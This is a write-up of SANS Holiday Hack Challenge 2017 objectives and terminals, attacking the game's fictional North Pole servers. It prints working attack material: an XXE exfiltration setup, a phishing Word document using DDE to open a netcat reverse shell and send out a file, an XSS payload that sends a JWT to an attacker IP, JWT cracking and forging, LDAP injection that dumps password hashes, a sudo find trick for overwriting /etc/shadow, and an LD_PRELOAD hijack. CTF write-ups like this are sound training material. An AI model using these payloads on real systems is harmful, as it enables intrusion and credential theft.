We have information for the EAAS host in our host list from my earlier nmap scan. It maps to
eaas.northpolechristmastown.com (10.142.0.13) and has port 445, 80, and 3389 open.
 SSH tunnel port 8080 locally to host 10.142.0.13 on port 80 remote host.
 ssh -L 8080:10.142.0.13:80 alabaster_snowball@35.185.84.51
 Setup web browser proxy again to point to locahost:8080 and visit eaas.northpolechristmastown.com and we
should see our EAAS website.
We do and there is a handy dandy little XML download helper too! The hints all suggest that we should be trying to
perform an XML compromise by uploading an XML payload. Let’s get that first by clicking on Download.

A file called Elfdata.xml gets downloaded and looks like this:

Well fortunately for us the Elves have automated their processes and left a gaping XML vulnerability. Let’s setup an
attacker web server and then upload a malicious XML file which uses the vulnerability in IIS to deliver us the
c:\greatbook.txt information from that file we need to get.
Setup
1) Setup a web accessible attacker server using apache on Kali Linux.
2) Create a specially coded .dtd file which will be grabbed, parse, and then connect back to send us information
that I’ll call grabFile.dtd.

3) Put that special exploit file into my /var/www/html root.

4) Then craft our XML attack payload

5) Setup a netcat listener on port 8080

6) Upload the attack XML file via the EAAS website.
7) Pray and hope it works, try 50 times. Finally success.

8)
9) Look at that we have a greatbook6.pdf at that funky named address.
10) Visit it in a browser and viola, we have greatbook6.pdf.

Terminal 6 Solution
Getting to the Terminal
This was a surprise. The entire field was covered by obnoxious red thingies. We can’t even see the terminal, let alone
play the game to get to the next level. So on to Chrome Developer Mode. In Developer Mode, I refresh the game and the
Network Tab shows me what’s being downloaded. I then filter by images to see if I can find the image of posies. I see
something called poppies.png so I right click and seelct “Block request URL” to prevent this item from coming through.
Refresh the page and the poppies are gone. Now I have checker pattern…..sigh. Okay let’s try to find this one in
developer mode. The only thing I see is a data:image/jpg;base64 encoded mess. The thumbnail looks like what I am
trying to prevent from coming through. So let’s block that URL, refresh the game page, and yay we have no mess. No
floor, but no mess either. Now I could do other things, like put a transparent or blank image so I have a clean floor. But I
just want the terminal, and to be able to see my snowball bouncing around. With that I can trail/error the solution. I’m a
lazy coder, I don’t like to go through too much effort here. And I can already see the terminal.
You see the terminal on the lower left quadrant there. Click it and on to the challenge!

Sugarplum Mary and the Gang want to identify the best Christmas song. We have a .db file and a runtoanswer binary. A
blog post by Ed Skoudis was posted about working with SQL earlier and provides some useful information here and it
helps us to solve this terminal challenge. https://pen-testing.sans.org/blog/2017/12/09/your-pokemon-guide-for-
essential-sql-pen-test-commands

First we find sqlite.

elf@0d2ac24d7118:~$ find / -executable -name "sqlite*"

/usr/bin/sqlite3
Then we fire it up and load our database file sqlite> .open christmassongs.db

Then check out the schema, this tells us what the database structure looks like sqlite> .schema

We have all the information we need to start querying the database and find the most popular song. Note that songs
and likes are two tables separate. We have to link them using that FOREIGN KEY aspect as that songs(id) column and
likes(songid) column are how the two are associated then we have to count how many likes are present for each song.

sqlite> select count(title) count,songs.title, likes.like from songs,likes

where songs.id=likes.songid group by title order by count asc;

Here I say, select a count of the number of title and name it count, as well as the songs.title, and likes.like from the
songs and likes tables whenever likes.songid is in songs.id then group the results by the title and order them by count
from lowest to highest. This yields the result that “Stairway to Heaven” is the most popular…Christmas…Song…really? I
mean it’s a great song, and probably the most played modern acoustic guitar song taught today but..ya okay I’ll take
that.

elf@83268e07282c:~$ ./runtoanswer
Starting up, please wait......
Enter the name of the song with the most likes: Stairway to Heaven
That is the #1 Christmas song, congratulations!
Objective 7 Solution
7) Like any other complex SCADA systems, the North Pole uses Elf-Machine Interfaces (EMI) to monitor and control
critical infrastructure assets. These systems serve many uses, including email access and web browsing. Gain access to
the EMI server through the use of a phishing attack with your access to the EWA server. Retrieve The Great Book page
from C:\GreatBookPage7.pdf. For hints on this challenge consult with Shinny Upatree
(https://twitter.com/ClimbALLdaTrees).

Mmkay, sounds like another case where getting the Terminal Solution and the hints will help dramatically. God bless you
chatty elves and your lack of Linux administration skills.

Hints from Shinny Upatree: Alabaster checks his email from the EMI system! He’s running IIS with ASPX services on the
EMI server as well as Microsoft Office. Word has a feature called Dynamic Data Exchange for transferring data between
applications and obtaining data from external sources, including executables.

That is a lot of information. Thanks Shinny. So, remember back when we pilfered the Elf Web Access mail application.
Well during our exploration of emails sent and received we saw an email from Alabaster asking for gingerbread cookies,
and that said he’d open anything that said gingerbread cookie recipe on it because he loved them so much. Well, if he
checks his email on the EMI server where our GreatBookPage7 is located at C:\ then maybe, just maybe we can get him
to open a rigged Word Document, given that he has Word on there too, and we can leverage DDE (Dynamic Data
Exchange) to exfiltrate the file to our attacker system. This will require an attacker webserver, a couple netcat listener
and sender which we assume will work because in email exchanges we noted that Alabaster was bragging about using
and adding netcat in his system path on his computers because he loves it so much. This means it’s likely on his systems,
and can be run from any path. Netcat can send us our file, if, we can get him to open it and trigger a send.

Setup

First let’s create a payload and test it within a word document. The specific exploit we are going to use it outlined in this
blog posting here: https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/. It is worth noting that
Microsoft Windows Defender and Security Essentials will protect from this attack vector, let’s hope that it doesn’t stop
our macro attack! We create a document called gingerbread cookie recipe.docx. We load it with a DDE attack that will
do a netcat send operation to our attacking server of sending the file we want.

This exploit calls a windows command prompt, executes the netcat binary which connects to my attacker machine’s
netcat listener on port 4444 and opens a command prompt on the host machine which will show on my attacker
machine. I could’ve sent the file directly over, however, I really wanted to nose around on this box to find more clues.

The payload in the gingerbread cookie recipe.docx file:

On my attacker server I run two netcat listeners. One for my command prompt and another to send files.

My attacker systems command prompt netcat listener: nc -nlvp 4444

Command to send the file from Windows server using netcat after changing directories to C:\ nc 11.22.33.44
8080 < GreatBookPage7.pdf

On my attacker server the netcat command to listen, -q waits for an EOF in the file to ensure it’s not corrupted, and then
outputs it to GreatBookPage7.pdf: nc -l -q 5 -p 4445 > GreatBookPage7.pdf

But we’re going to need to entice Alabaster to open the email. So we log into EWA site as none other than Mrs. Jessica
Clause, as she has the best cookies according to everyone, and we write to Alabaster the following:

Email address: alabaster.snowball@northpolechristmastown.com

Subject: gingerbread cookie recipe
Body: Here is a gingerbread cookie recipe for you

We Attach our special DDEAUTO laden .docx file and wait and send email. If all works as plan, which it does after sending
A LOT of recipes to Alabaster. We get a connection and can copy over the greatbookpage7.pdf file.

We now have Page 7 of the Great Book.

Terminal 7 Solution

We need to restore the shadow file from the shadow.bak file without having access to it. Shinny gives us a hint too.
What commands can we run with sudo? Let’s see! Running sudo –ll will show us what permissions we have to run
other things and give us a little more detail than just sudo –l.

elf@6bd69794cf2b:~$ sudo –ll

Matching Defaults entries for elf on 6bd69794cf2b:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\
:/snap/bin
User elf may run the following commands on 6bd69794cf2b:
Sudoers entry:
RunAsUsers: elf
RunAsGroups: shadow
Options: !authenticate
/usr/bin/find

So we see from our terminal output that we are part of the shadow group and that we may be able to use this privilege
to replace /etc/shadow with our /etc/shadow.bak. The problem is we can only run /usr/bin/find as sudo. Hmmm…let’s
see what the user and group permissions are on the shadow file.

elf@6bd69794cf2b:~$ ls -ll /etc/shadow*

-rw-rw---- 1 root shadow 0 Dec 15 20:00 /etc/shadow
-rw------- 1 root root 652 Nov 14 13:48 /etc/shadow-
-rw-r--r-- 1 root root 677 Dec 15 19:59 /etc/shadow.bak

Check that out, the shadow group and write to the /etc/shadow file. But how can we make a find write? Now comes the
power of finds -exec argument. Reviewing the man page for find at (https://linux.die.net/man/1/find we see an option
for -exec command {}+; We can combine this with a sudo –g shadow to run sudo as the group privilege
shadow, find the file we want, then copy it over the existing /etc/shadow file with our shadow privilege.

elf@19775c758371:~$ sudo -g shadow find /etc/shadow.bak -exec cp {}

/etc/shadow \;

This runs sudo with shadow privileges. Then runs the command cp /etc/shadow.bak /etc/shadow \; Then we close our
command chain with a \; The results are fixed /etc/shadow! Now to our delicious tool and hints!

elf@6bd69794cf2b:~$ ls -ll /etc/shadow*

-rw-rw---- 1 root shadow 677 Jan 3 23:35 /etc/shadow
-rw------- 1 root root 652 Nov 14 13:48 /etc/shadow-
-rw-r--r-- 1 root root 677 Dec 15 19:59 /etc/shadow.bak
Objective 8 Solution
Fetch the letter to Santa from the North Pole Elf Database at http://edb.northpolechristmastown.com. For hints on
solving this challenge, please locate Wunorse Openslae (https://twitter.com/1Horse1OSSleigh) in the North Pole and
Beyond.

Wunorse OpenSlae Hints: Elves have multiple jobs in the North Pole and Wunorse works as a help desk support
associate for the North Pole Elf Database site to answer password reset requests. He had a XSS attack once so Alabaster
“fixed” it by adding some filtering on the system. Wunorse points us to here
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet and hopes Alabaster filtered ALL those items.
Alabaster uses JWT tokens, which can be cracked and recreated using a framework like pyjwt
https://github.com/jpadilla/pyjwt to forge a key. They query a directory database, Santa asked that Alabaster restricted
the search results to elves and reindeer. Wunorse found an article about LDAP injection too https://pen-
testing.sans.org/blog/2017/11/27/understanding-and-exploiting-web-based-ldap.

Wow that’s a lot of hints Wunorse, you’re fired. Go to SANS training for Securing the Human, do not pass go. Do not
collect $100.

Uh, sorry I just love ANY opportunity to include the Monopoly man. Before I begin on the XSS vector, my goal here is to
get a letter to Santa from the edb system. Apparently only Santa can do this, as Alabaster restricted his information. So I
need to get Santa’s password or hash and crack it. But first have to use XSS to gain access to a JWT token, crack it’s key,
then forge the token.

But during my initial recon of the edb system I saw that port 389 was open and I know this is the standard LDAP port.
So…I SSH tunneled my Kali attacker machine’s port 389 to it and tried to connect with a program called jxplorer, which a
friend mentioned was a good LDAP browser.

Initial nmap recon output for edb

edb.northpolechristmastown.com (10.142.0.6)

22/tcp open ssh

80/tcp open http
389/tcp open ldap
8080/tcp open http-proxy

Using our Kali attacker Box, setup an SSH tunnel directing port 11389 to port 389 on edb

ssh -L 11389:10.142.0.6:389 alabaster_snowball@35.185.84.51

I fired up jxplorer and pointed it to 127.0.0.1:11389 and viola. We have a nice LDAP browser, and Santa’s password hash.
Now here is where I made an ethical hacking choice. I didn’t think this was very appropriate to bypass the gaming
structure (not doing the XSS, JWT token cracking/forging, etc.) so I disclosed the misconfigured EDB system to the
proper personnel, you know who you are. Then I had some other real world tasks to do. By the time I returned to search
Google for Santa’s hash, the LDAP port had been closed, and Santa changed his password. Bummer, guess I’ll have to
perform the original attack vectors. Originally the password was 1iwantacookie but now I’m going to have to go in the
hard way.

 So let’s first try to understand the XSS filtering Alabaster put on. We’ll need to access the
edb.northpolechristmastown.com system, then see how it works.
ssh -L 80:10.142.0.6:80 alabaster_snowball@35.185.84.51
 Configure my proxy in Firefox as before and browse the edb website.
 I crawled the site and found a /dev/LDIF_template.txt file laden with LDAP schema information. So that will
come in handy during our LDAP injection phase.
 Let’s browse to the site edb and we see a login screen, and Wunorse’s Support link too. That’s our XSS vector.
 Visiting this Support link takes us here and we now get to see how this puppy ticks. View Source.

 Viewing the source we see the following scripts added

 The script is looking for a cookie, if no cookie exists, send visitor to root of the web server.
 It’s also calling a custom.js script. This has the name of the local storage token “np-auth” and
A LOGIN FORM shows us what it’s looking for and where the token is sent
 We also see the XSS Protection mechanism
Our XSS protection is the line below. It searches text for the word script in the message body, in any in
form of SCRIPT, script, ScRiPT, etc..So we know we can’t use the WORD script in there, but there are a
lot of XSS ways around that.

 After much trial and error, I ended up injecting the following into the Message field for the edb
support request form. This will bypass the XSS security check for the case insensitive word “script” and
then reach out and append any np-auth local storage token information to my listening web server
where I can just pick it out of my access.log.
<body
onload=window.location='http://1.2.33.44/?id='+localStorage.getItem('
np-auth')>
 My website access.log shows the JWT token appended to a GET request
35.196.239.128 - - [30/Dec/2017:18:47:39 +0000] "GET
/?id=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4c
GlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm
93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I HTTP/1.1" 200 3380
"http://127.0.0.1/reset_request?ticket=V2798-C206K-2Z7IG-3ZAZ7" "Mozilla/5.0 (Unknown; Linux
x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"
 Learning about JWT tokens, I recall they are base64 encoded. So I use an online base64 decoder and
decode the JWT into ASCII which gives:
{"alg":"HS256","typ":"JWT"}{"dept":"Engineering","ou":"elf","expires":"2017-08-16
12:00:47.248093+00:00","uid":"alabaster.snowball"}3x#pkxHl__xDUa+
 I now have a token, know how it’s encrypted, some details about the LDAP fields, but if you notice, it’s
expired. I have to forge my own path, err, token. To do that, I have to crack the key it’s encrypted with
and generate a new one. Enter jwtcrack (https://github.com/flesler/jwt-crack) Pass it a JWT base64
encoded token and it’ll brute force crack it.
 Jwtcrack cracks the token pretty fast. The encryption key/password is 3lv3s. Nice. Elves. So now I
know I need to sign my forged jwt token with 3lv3s.
 Now I need a tool to create a forged JWT token, the reading refers to something called jwt_tool. Pass it
the encoded token and we get this:
 Ookay, let’s try to change this expiration date by using option 5, Tamper. Setting the token expiration
to August of next year.

 Then we need to sign the token with our 3lv3s key and using HMAC-SHA256.

 We get a new forged token created. Let’s create an np-auth localStorage key in Firefox Developer tools, then put
this value into it for the key-pair. Refreshing the page logs us in.
 Logged into the EDB database, we can start checking out the LDAP structure and try LDAP injection, but first let’s
do a legitimate search so that we can get some field information back. Search for * all columns. Then inspect the
file.

 We analyze the source code and see we can tweak the columns passed to the search. Because I found the
LDIF_template.txt file I know which attributes belong to humans, e.g. Santa and I know I need the userPassword
attribute to see a hash.
Human OU information:
dn: ou=human,dc=northpolechristmastown,dc=com
objectClass: organizationalUnit
ou: human
 We also see in the source code the function find_elves() which has a comment with the attribute_list for LDAP
attributes passed, and the format of the LDAP query. Now we know how we can alter the attribute_list because
there are no limitations at this point, and then what our LDAP query will look like to ensure we get more than
we are permitted.

 Let’s edit the attributes in the first drop-down option and edit the values then do another search to send those
attributes then search.

 Ahh, it successfully returns the attributes for userPassword.

  Now to get to Santa’s password hash. We will need to understand how to modify the search field with an LDAP
query. Adding the following code into the search field: )(uid=*))(|(userpassword=
 An LDAP search for Santa would look like the following:
(|(&(gn=*Name*)(ou=’elf’))(&(sn=*Name*)(ou='elf')))
This is performing an OR operation where either the gn or sn is ‘Santa’
 This code will turn that ldap_query up above into the following query:
 (|(&(gn=*)(uid=*))(|(userpassword=*)(ou=’elf’))(&(sn=*)(uid=*))(|(userpasswo
rd=*)(ou='elf')))
In LDAP query this asks for records where either gn,uid are anything, or userpassword is anything or ou is elf OR
sn,uid are anything, or userpassword is anything or ou is elf.
 The results are a list of all LDAP entries with their hashes, including Santa. Now let’s crack it, or better yet,
search for it on the internet.

 Visit https://isc.sans.edu/tools/reversehash.html and enter the Hash and it comes back with this:
md5 hash d8b4c05a35b0513f302a85c409b4aab3 = 001cookielips001
 Time to log in as Santa.

 Let’s check out that Santa Panel

And who do we see a letter from? None other than Santa’s pal, The Wizard of Oz!
Terminal 8 Solution
Let’s take a minute to talk about how hard it was to unseat the villain in this last game before we talk about the tutorial.
It really required all the tools, some portals, and some trial and errors. Now I know I could’ve hacked the JavaScript and
cheated, but I thought that was out of scope, so I didn’t. Plus I had fun. Here’s my final solution which got to unseat the
villain, I move the snowballs with portals, slow them down, let it careen off the edge and then bounce up to knock him
off. It was a true feat of snowball engineering. I just thought I’d share that with you.
Anyway on to the terminal solution! Logging in we see a programming dilemma.

I’m not super good at C/C++ programming but I have stepped up my study lately. And as usual, that studying paid
dividends here. Also reading the blog post helped to fill in the gaps too:
Hijacking external function calls read this post: https://pen-testing.sans.org/blog/2017/12/06/go-to-the-head-of-the-
class-ld-preload-for-the-win So I had the basic idea already, I need to subvert the rand function which is used by the
isit42 program. But I didn’t remember how. Thus introduce shared objects/libraries.

We can see from the partial snippet of code that the getrand() function uses srand() which is initialized with time(NULL).
Then rand() is returned then compared to see if it’s 42. How about we just write our own rand() function to return 42
and put it before the rand() function which comes from the stdio library.

Writing the code is a few lines.

nano rigIt.c

#include <stdio.h>
//returns 42 when rand is called
unsigned int rand(unsigned int myValues){
printf("Return 42! Hijacked rand");
return 42;
}
I created a c file called rigIt.c and made a function that will print the statement above and then return 42. I also named it
rand because that’s what our isit42 program uses and I want it to use mine instead. Next we have to compile it into
shared object so it can be used by other programs.

gcc rigIt.c -o rigIt -shared -fPIC

This gcc compiler option creates a shared object which can be used by other files. Uh, read the blog post for more
details. This report is getting long. Now let’s use it to subvert our isit42 program.
elf@fd6e6083efc3:~$ LD_PRELOAD="$PWD/rigIt" ./isit42
Starting up ... done.
Calling rand() to select a random number.
Return 42! Hijacked rand
.-. \
.;;\\ || _______ __ __ _______ _______ __ _ _______ _ _ _______ ______ \
/::::\\|/ | || | | || | | _ || | | || || | _ | || || _ |\
/::::'(); |_ _|| |_| || ___| | |_| || |_| || _____|| || || || ___|| | ||\
|\\/`\\:_/`\\/| | | | || |___ | || || |_____ | || |___ | |_||_ \
,__ |0_..().._0| __, | | | || ___| | || _ ||_____ || || ___|| __ |\
\\,`////""""\\\\\\\\`,/ | | | _ || |___ | _ || | | | _____| || _ || |___ | | | |\
| )//_ o o _\\\\( | |___| |__| |__||_______| |__| |__||_| |__||_______||__| |__||_______||___| |_|\
\\/|(_) () (_)|\\/ \
\\ '()' / ______ _______ _______ ___ ___ __ __ ___ _______ \
_:.______.;_ | _| | || _ || | | | | | | | | | | |\
/| | /`\\/`\\ | |\\ | | || | ___|| |_| || | | | | |_| | | | | _____|\
/ | | \\_/\\_/ | | \\ | |_||_ | |___ | || | | | | | | | | |_____ \
/ |o`""""""""`o| \\ | __ || ___|| || |___ | |___ |_ _| | | |_____ |\
`.__/ () \\__.' | | | || |___ | _ || || | | | | | _____| |\
| | ___ ___ | | |___| |_||_______||__| |__||_______||_______| |___| |___| |_______|\
 / \\|---| |---|/ \\ \
| (|42 | () | DA|) | _ ___ _______ \
\\ /;---' '---;\\ / | | | || |\
`` \\ ___ /\\ ___ / `` | |_| ||____ |\
`| | | |` | | ____| |\
jgs | | | | |___ || ______| ___ \
_._ |\\|\\/||\\/|/| _._ | || |_____ | |\
/ .-\\ |~~~~||~~~~| /-. \\ |___||_______||___|\
| \\__.' || '.__/ |\
`---------''---------` \

Congratulations! You've won, and have successfully completed this challenge.

Now we get our tool, hints, our glory and a cool ASCII elf! Now on to that last Objective challenge. Thank you for a
fantastic time SANS, I really enjoyed this activity. There is no doubt many thanks to my fellow slack chat room buddies
on CentralSec slack which includes Justin, ustayready, cma, denied39, gl0b0, Gu4r15m0, jeffmcjunkin, mxdata, notx11,
packet_wire, teh_warriar, RegularDave, thatsme, v, and yogi. Also, the entire SANS holiday hack challenge team.

FYI if SANS doesn’t close the LDAP next time, this would have been a much shorter report! =)